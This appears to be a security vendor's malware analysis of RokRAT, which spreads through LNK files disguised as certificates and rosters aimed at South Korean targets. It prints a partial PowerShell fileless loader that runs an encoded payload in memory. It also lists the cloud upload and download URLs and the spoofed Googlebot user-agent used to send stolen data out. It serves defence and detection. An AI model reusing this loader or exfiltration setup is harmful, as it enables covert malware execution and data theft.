LNK File Disguised as Certificate Distributing RokRAT Malware

AhnLab SEcurity intelligence Center (ASEC) has confirmed the continuous distribution of shortcut files (*.LNK) of abnormal sizes that disseminate backdoor-type malware. The recently confirmed shortcut files (*.LNK) are found to be targeting South Korean users, particularly those related to North Korea. The confirmed LNK file names are as follows:

• National Information Academy 8th Integrated Course Certificate (Final).lnk
• Gate access roster 2024.lnk
• Northeast Project (US Congressional Research Service (CRS Report).lnk
• Facility list.lnk

The confirmed LNK files contain a command to execute PowerShell via CMD, and their type is similar to the type found in “RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)” [1] posted last year. A notable fact about this type is that it includes legitimate document files, script code, and malicious PE data inside the LNK files.

The simplified operation process of the malware is as shown below.

When the LNK file is executed, it runs PowerShell commands to create and execute a legitimate document file.

Afterward, it creates 3 files in the %public% folder. The names and features of the files created in this step are as follows.

File name	Location in LNK File	Feature
viewer.dat	0x2BC97 (size:0xD9402)	Encoded RokRAT malware
search.dat	0x105099 (size:0x5AA)	Executes viewer.dat file
find.bat	0x105643 (size:0x139)	Executes search.dat file

Table 1. List of created files

The first executed item is “find.bat”, which runs “search.dat” via PowerShell. “search.dat” reads the “viewer.dat” file and executes it in a fileless manner.

$exePath=$env:public+'\'+'viewer.dat';
$exeFile = Get-Content -path $exePath -encoding byte;
[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);
$k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34);
<중략>
$byteCount = $exeFile.Length;
$buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);
$old = 0;
$a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);
for($i = 0;$i -lt $byteCount;$i++) {
	[System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]);	};
$handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);
$fried3sd23::WaitForSingleObject($handle, 500 * 1000);

The data of “viewer.dat” that is ultimately executed is the RokRAT malware, which is a backdoor-type malware capable of utilizing cloud APIs to collect user information and perform various malicious behaviors at the threat actor’s command.

The collected information is transmitted to the threat actor’s cloud server using cloud services such as pCloud, Yandex, and DropBox. At this point, the UserAgent in the request header is disguised as Googlebot, and the cloud URLs used are as follows in the table below.

• User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Cloud	URL
Pcloud(Down)	https://api.pcloud.com/getfilelink?path=%s&forcedownload=1&skipfilename=1
Pcloud(up)	https://api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1
Yandex(Down)	https://cloud-api.yandex.net/v1/disk/resources/download?path=%s
Yandex(up)	https://cloud-api.yandex.net/v1/disk/resources/upload?path=%s&overwrite=%s
DropBox(Down)	https://content.dropboxapi.com/2/files/download
DropBox(up)	https://content.dropboxapi.com/2/files/upload

Table 2. Details on the cloud URLs used

The malicious behaviors that can be executed according to the threat actor’s command include:

• Execution of cmd commands
• Collection of directory listings
• Deletion of specific files (with VBS, CMD, BAT, and LNK extensions) within the Startup folder
• Collection of Startup folder listings, %APPDATA% folder listings, and recently used file listings
• Collection of PC information (system information, IP, router information, etc.)

Additionally, various other malicious behaviors can be performed, and the collected information is stored in the %TEMP% folder before being uploaded to the threat actor’s cloud server. The email addresses of the threat actor identified during the analysis process are as follows.

• tanessha.samuel@gmail[.]com
• tianling0315@gmail[.]com
• w.sarah0808@gmail[.]com
• softpower21cs@gmail[.]com

Through its blog, ASEC has been consistently sharing information about the distribution of malicious shortcut file due to the frequent occurrence of such incidents. In particular, malware aimed at individuals associated with Korean unification, military, and education has been continuously identified since the past, highlighting the need for extra caution.

[File Detection]
Dropper/LNK.S2343 (2024.04.12.03)
Trojan/BAT.Runner (2024.04.12.00)
Trojan/Script.Generic (2024.04.12.00)
Data/BIN.EncPe (2024.04.12.00)
Infostealer/Win.Agent.R579429 (2023.05.05.01)

MD5

3114a3d092e269128f72cfd34812ddc8

35441efd293d9c9fb4788a3f0b4f2e6b

358122718ba11b3e8bb56340dbe94f51

68386fa9933b2dc5711dffcee0748115

6e5e5ec38454ecf94e723897a42450ea